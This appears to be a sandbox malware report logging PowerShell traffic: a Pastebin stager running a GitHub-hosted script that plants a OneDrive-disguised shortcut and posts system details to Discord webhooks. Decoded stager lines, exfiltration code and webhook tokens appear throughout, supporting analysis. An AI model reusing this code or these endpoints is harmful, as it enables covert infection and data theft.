                                                                                    2024-10-15 16:08:27 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:27 UTC900INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:27 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdal2120147-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 0
                                                                                    X-Timer: S1729008508.672456,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: a517ae11f5430e7c3dbc3b799ef68f49134e885a
                                                                                    Expires: Tue, 15 Oct 2024 16:13:27 GMT
                                                                                    Source-Age: 207
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 16:08:27 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 16:08:27 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.749775162.159.138.2324436648C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:27 UTC311OUTPOST /api/webhooks/1284710807871033355/x0K3Voa94DlgTs4VQWHyks9bUB8i5Uipo6HRW6lKUeKFJpTODgkBqgFx7seLHmsLq996 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
                                                                                    Content-Length: 215
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:27 UTC215OUTData Raw: 7b 0d 0a 20 20 20 20 22 63 6f 6e 74 65 6e 74 22 3a 20 20 22 2a 2a 66 72 6f 6e 74 64 65 73 6b 2a 2a 20 68 61 73 20 6a 6f 69 6e 65 64 20 2d 20 46 48 35 5c 6e 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 5c 6e 2a 2a 47 50 55 3a 2a 2a 20 36 48 4b 47 5a 42 5c 6e 2a 2a 43 50 55 3a 2a 2a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 20 49 6e 74 65 6c 28 52 29 20 43 6f 72 65 28 54 4d 29 32 20 43 50 55 20 36 36 30 30 20 40 20 32 2e 34 30 20 47 48 7a 5c 6e 2a 2a 43 50 55 20 43 6f 72 65 73 3a 2a 2a 20 34 20 34 22 0d 0a 7d
                                                                                    Data Ascii: { "content": "**user** has joined - FH5\n----------------------------------\n**GPU:** 6HKGZB\n**CPU:** Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\n**CPU Cores:** 4 4"}
                                                                                    2024-10-15 16:08:27 UTC1251INHTTP/1.1 404 Not Found
                                                                                    Date: Tue, 15 Oct 2024 16:08:27 GMT
                                                                                    Content-Type: application/json
                                                                                    Content-Length: 45
                                                                                    Connection: close
                                                                                    Cache-Control: public, max-age=3600, s-maxage=3600
                                                                                    strict-transport-security: max-age=31536000; includeSubDomains; preload
                                                                                    x-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5f
                                                                                    x-ratelimit-limit: 5
                                                                                    x-ratelimit-remaining: 4
                                                                                    x-ratelimit-reset: 1729008509
                                                                                    x-ratelimit-reset-after: 1
                                                                                    via: 1.1 google
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    CF-Cache-Status: DYNAMIC
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=imyMIeHTEUKrovK9QjsYTPhziEcFHvbCRUmlHJ04Sdmlni2azLULDXKhTQkqtByBt2d%2BDgG9HPAIrcuLyL3JBGB3bLQkl2IhNuZitGsHxCfOPpeMjmsew252GVSl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    X-Content-Type-Options: nosniff
                                                                                    Set-Cookie: __cfruid=79c012eaf9029fed6f4174fc912d62fc9df2f131-1729008507; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Content-Security-Policy: frame-ancestors 'none'; default-src 'none'
                                                                                    Set-Cookie: _cfuvid=NRZYuviVxKznP8b._.zmL4nobhKDT8sSIL_kl3WgFCM-1729008507935-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d311165fb836c3d-DFW
                                                                                    2024-10-15 16:08:27 UTC45INData Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 20 22 55 6e 6b 6e 6f 77 6e 20 57 65 62 68 6f 6f 6b 22 2c 20 22 63 6f 64 65 22 3a 20 31 30 30 31 35 7d
                                                                                    Data Ascii: {"message": "Unknown Webhook", "code": 10015}


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    5192.168.2.749810104.20.3.2354437912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:34 UTC169OUTGET /raw/sA04Mwk2 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: pastebin.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:34 UTC397INHTTP/1.1 200 OK
                                                                                    Date: Tue, 15 Oct 2024 16:08:34 GMT
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    x-frame-options: DENY
                                                                                    x-content-type-options: nosniff
                                                                                    x-xss-protection: 1;mode=block
                                                                                    cache-control: public, max-age=1801
                                                                                    CF-Cache-Status: HIT
                                                                                    Age: 633
                                                                                    Last-Modified: Tue, 15 Oct 2024 15:58:01 GMT
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d31118ff88be9b9-DFW
                                                                                    2024-10-15 16:08:34 UTC139INData Raw: 38 35 0d 0a 63 61 6c 6c 69 54 28 57 49 4e 44 4f 57 53 5f 4e 54 20 28 22 72 61 77 2e 67 69 22 2b 22 74 68 75 62 22 2b 22 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 22 2b 22 6f 6d 2f 4e 65 22 2b 22 74 68 33 4e 2f 6e 61 39 6f 77 33 34 39 35 72 61 79 67 77 69 34 22 2b 22 67 79 72 68 75 61 77 65 72 61 77 65 72 61 2f 6d 61 69 6e 2f 67 61 62 65 72 2e 74 78 74 22 29 20 2d 75 73 65 62 61 73 69 63 70 61 72 73 69 6e 67 29 0d 0a
                                                                                    Data Ascii: 85calliT(WINDOWS_NT ("raw.gi"+"thub"+"usercontent.c"+"om/Ne"+"th3N/na9ow3495raygwi4"+"gyrhuawerawera/main/gaber.txt") -usebasicparsing)
                                                                                    2024-10-15 16:08:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    6192.168.2.749821185.199.109.1334437912C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:35 UTC222OUTGET /Neth3N/na9ow3495raygwi4gyrhuawerawera/main/gaber.txt HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Host: raw.githubusercontent.com
                                                                                    Connection: Keep-Alive
                                                                                    2024-10-15 16:08:36 UTC900INHTTP/1.1 200 OK
                                                                                    Connection: close
                                                                                    Content-Length: 7508
                                                                                    Cache-Control: max-age=300
                                                                                    Content-Security-Policy: default-src 'none'; style-src 'unsafe-inline'; sandbox
                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                    ETag: "3c1076fda9d7a9f1de3ceb011a6f68a3886388e35b154b66990b49e988bc5cbd"
                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                    X-Content-Type-Options: nosniff
                                                                                    X-Frame-Options: deny
                                                                                    X-XSS-Protection: 1; mode=block
                                                                                    X-GitHub-Request-Id: 47F7:29E79C:808B02:8D3F30:670E7B3C
                                                                                    Accept-Ranges: bytes
                                                                                    Date: Tue, 15 Oct 2024 16:08:36 GMT
                                                                                    Via: 1.1 varnish
                                                                                    X-Served-By: cache-dfw-kdfw8210072-DFW
                                                                                    X-Cache: HIT
                                                                                    X-Cache-Hits: 1
                                                                                    X-Timer: S1729008516.045638,VS0,VE1
                                                                                    Vary: Authorization,Accept-Encoding,Origin
                                                                                    Access-Control-Allow-Origin: *
                                                                                    Cross-Origin-Resource-Policy: cross-origin
                                                                                    X-Fastly-Request-ID: eab2a342711277d383aefab66267ea15291ef5d0
                                                                                    Expires: Tue, 15 Oct 2024 16:13:36 GMT
                                                                                    Source-Age: 215
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 73 6c 65 65 70 20 35 0a 72 6d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 20 2d 46 6f 72 63 65 0a 73 6c 65 65 70 20 35 0a 0a 0a 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 20 3d 20 22 43 3a 5c 50 72 6f 67 72 61 6d 44 61 74 61 5c 4d 69 63 72 6f 73 6f 66 74 20 4f 6e 65 44 72 69 76 65 5c 46 69 6c 65 53 79 6e 63 5c 42 65 67 69 6e 53 79 6e 63 2e 6c 6e 6b 22 0a 69 66 20 28 2d 4e 6f 74 20 28 54 65 73 74 2d 50 61 74 68 20 24 67 6f 6f 67 6f 6f 67 61 61 67 61 61 29 29 20 7b 0a 72 6d 20 24 65 6e 76 3a 74 6d 70 5c 6f 6e 65 64 72 69 76 65 66 69 6c 65 73 79 6e 63 2e 64 6c 6c 20 2d 66 6f 72 63 65 0a 4e 65 77 2d 49 74 65 6d 50 72 6f 70 65 72 74
                                                                                    Data Ascii: sleep 5rm "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk" -Forcesleep 5$googoogaagaa = "C:\ProgramData\Microsoft OneDrive\FileSync\BeginSync.lnk"if (-Not (Test-Path $googoogaagaa)) {rm $env:tmp\onedrivefilesync.dll -forceNew-ItemPropert
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 2c 30 2c 30 2c 37 34 2c 30 2c 39 2c 30 2c 34 2c 30 2c 32 33 39 2c 31 39 30 2c 31 36 37 2c 38 34 2c 31 33 30 2c 34 32 2c 34 31 2c 38 39 2c 32 30 38 2c 31 38 39 2c 34 36 2c 30 2c 30 2c 30 2c 36 35 2c 32 34 38 2c 30 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 31 36 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 33 32 2c 31 31 36 2c 32 36 2c 30 2c 31 30 32 2c 30 2c 31 31 31 2c 30 2c 31 31 34 2c 30 2c 31 30 32 2c 30 2c 31 30 35 2c 30 2c 31 30 38 2c 30 2c 31 30 31 2c 30 2c 31 31 35 2c 30 2c 34 36 2c 30 2c 31 30 31 2c 30 2c 31 32 30 2c 30 2c 31 30 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 38 36 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 31 2c 30 2c 30 2c 30 2c 32 38 2c 30 2c 30 2c 30 2c 35 32 2c 30 2c 30 2c 30 2c 30 2c
                                                                                    Data Ascii: ,0,0,74,0,9,0,4,0,239,190,167,84,130,42,41,89,208,189,46,0,0,0,65,248,0,0,0,0,1,0,0,0,0,0,116,0,0,0,0,0,0,0,0,0,132,116,26,0,102,0,111,0,114,0,102,0,105,0,108,0,101,0,115,0,46,0,101,0,120,0,101,0,0,0,28,0,0,0,86,0,0,0,28,0,0,0,1,0,0,0,28,0,0,0,52,0,0,0,0,
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 31 31 36 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 36 39 2c 30 2c 31 32 30 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 31 31 35 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 33 32 2c 30 2c 33 36 2c 30 2c 31 30 31 2c 30 2c 31 31 30 2c 30 2c 31 31 38 2c 30 2c 35 38 2c 30 2c 31 31 31 2c 30 2c 31 31 35 2c 30 2c 33 32 2c 30 2c 31 30 35 2c 30 2c 38 37 2c 30 2c 31 31 34 2c 30 2c 35 39 2c 30 2c 33 32 2c 30 2c 39 39 2c 30 2c 39 37 2c 30 2c 31 30 38 2c 30 2c 31 30 38 2c 30 2c 31 30 35 2c 30 2c 38 34 2c 30 2c 34 30 2c 30 2c 38 37 2c 30 2c 37 33 2c 30 2c 37 38 2c 30 2c 36 38 2c 30 2c 37 39 2c 30 2c 38 37 2c 30 2c 38 33 2c 30 2c 39 35 2c 30 2c 37 38 2c 30 2c 38 34 2c 30 2c 33 32 2c 30 2c 31 31 32 2c
                                                                                    Data Ascii: ,0,97,0,108,0,108,0,105,0,116,0,32,0,105,0,69,0,120,0,59,0,32,0,115,0,97,0,108,0,32,0,36,0,101,0,110,0,118,0,58,0,111,0,115,0,32,0,105,0,87,0,114,0,59,0,32,0,99,0,97,0,108,0,108,0,105,0,84,0,40,0,87,0,73,0,78,0,68,0,79,0,87,0,83,0,95,0,78,0,84,0,32,0,112,
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 31 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 34 38 2c 30 2c 35 30 2c 30 2c 34 39 2c 30 2c 34 35 2c 30 2c 35 37 2c 30 2c 34 39 2c 30 2c 35 33 2c 30 2c 35 32 2c 30 2c 35 31 2c 30 2c 35 36 2c 30 2c 34 38 2c 30 2c 35 34 2c 30 2c 35 37 2c 30 2c 34 35 2c 30 2c 35 31 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 30 2c 30 2c 35 31 2c 30 2c 35 34 2c 30 2c 35 31 2c 30 2c 35 37 2c 30 2c 35 32 2c 30 2c 35 32 2c 30 2c 34 35 2c 30 2c 34 39 2c 30 2c 34 38 2c 30 2c 34 38 2c 30 2c 34 39 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 30 2c 31 37 37 2c 30 2c 30 2c 30 2c 34 39 2c 38 33 2c 38 30 2c 38 33 2c 34 38 2c 32 34 31 2c 33 37 2c 31 38 33 2c 32 33 39 2c 37 31 2c 32 36 2c 31 36 2c 31 36 35 2c 32 34 31 2c 32 2c 39 36 2c 31 34 30 2c 31 35 38 2c 32 33 35 2c 31 37 32 2c 34
                                                                                    Data Ascii: 1,0,51,0,50,0,51,0,48,0,50,0,49,0,45,0,57,0,49,0,53,0,52,0,51,0,56,0,48,0,54,0,57,0,45,0,51,0,50,0,50,0,50,0,51,0,54,0,51,0,57,0,52,0,52,0,45,0,49,0,48,0,48,0,49,0,0,0,0,0,0,0,177,0,0,0,49,83,80,83,48,241,37,183,239,71,26,16,165,241,2,96,140,158,235,172,4
                                                                                    2024-10-15 16:08:36 UTC1378INData Raw: 63 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 50 72 6f 63 65 73 73 6f 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 4d 61 6e 75 66 61 63 74 75 72 65 72 2c 20 4e 75 6d 62 65 72 4f 66 43 6f 72 65 73 2c 20 4e 75 6d 62 65 72 4f 66 4c 6f 67 69 63 61 6c 50 72 6f 63 65 73 73 6f 72 73 0a 0a 23 20 52 65 74 72 69 65 76 65 20 47 50 55 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 0a 24 67 70 75 20 3d 20 47 65 74 2d 57 6d 69 4f 62 6a 65 63 74 20 2d 43 6c 61 73 73 20 57 69 6e 33 32 5f 56 69 64 65 6f 43 6f 6e 74 72 6f 6c 6c 65 72 20 7c 20 53 65 6c 65 63 74 2d 4f 62 6a 65 63 74 20 2d 50 72 6f 70 65 72 74 79 20 4e 61 6d 65 2c 20 41 64 61 70 74 65 72 52 41 4d 2c 20 44 72 69
                                                                                    Data Ascii: cpu = Get-WmiObject -Class Win32_Processor | Select-Object -Property Name, Manufacturer, NumberOfCores, NumberOfLogicalProcessors# Retrieve GPU information$gpu = Get-WmiObject -Class Win32_VideoController | Select-Object -Property Name, AdapterRAM, Dri
                                                                                    2024-10-15 16:08:36 UTC618INData Raw: 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 3d 0a 22 40 0a 7d 20 7c 20 43 6f 6e 76 65 72 74 54 6f 2d 4a 73 6f 6e 0a 0a 23 20 53 65 6e 64 20 74 68 65 20 50 4f 53 54 20 72 65 71 75 65 73 74 20 74 6f 20 74 68 65 20 77 65 62 68 6f 6f 6b 20 55 52 4c 0a 74 72 79 20 7b 0a 20 20 20 20 49 6e 76 6f 6b 65 2d 52 65 73 74 4d 65 74 68 6f 64 20 2d 55 72 69 20 24 77 65 62 68 6f 6f 6b 55 72 6c 20 2d 4d 65 74 68 6f 64 20 50 6f 73 74 20 2d 42 6f 64 79 20 24 70 61 79 6c 6f 61 64 20 2d 43 6f 6e 74 65 6e 74 54 79 70 65 20 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 6a 73 6f 6e 22 0a 20 20 20 20 57 72 69 74 65 2d 4f 75 74 70 75 74 20 22 4d 65 73 73 61 67 65 20 73 65 6e 74 20 73 75 63 63 65 73 73 66 75 6c 6c 79 2e 22 0a 7d 20 63 61 74 63 68 20 7b 0a 20 20 20 20 57
                                                                                    Data Ascii: ======================"@} | ConvertTo-Json# Send the POST request to the webhook URLtry { Invoke-RestMethod -Uri $webhookUrl -Method Post -Body $payload -ContentType "application/json" Write-Output "Message sent successfully."} catch { W


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    7192.168.2.749852162.159.138.2324437548C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-15 16:08:41 UTC311OUTPOST /api/webhooks/1295751966227566694/ZDOwsWbEeGMPmjLUQsSudsSfhqvBoNBR93K3nrkS5aL7Ewva-6hqlEBSmLu1WVR5cEN5 HTTP/1.1
                                                                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                                    Content-Type: application/json
                                                                                    Host: discord.com
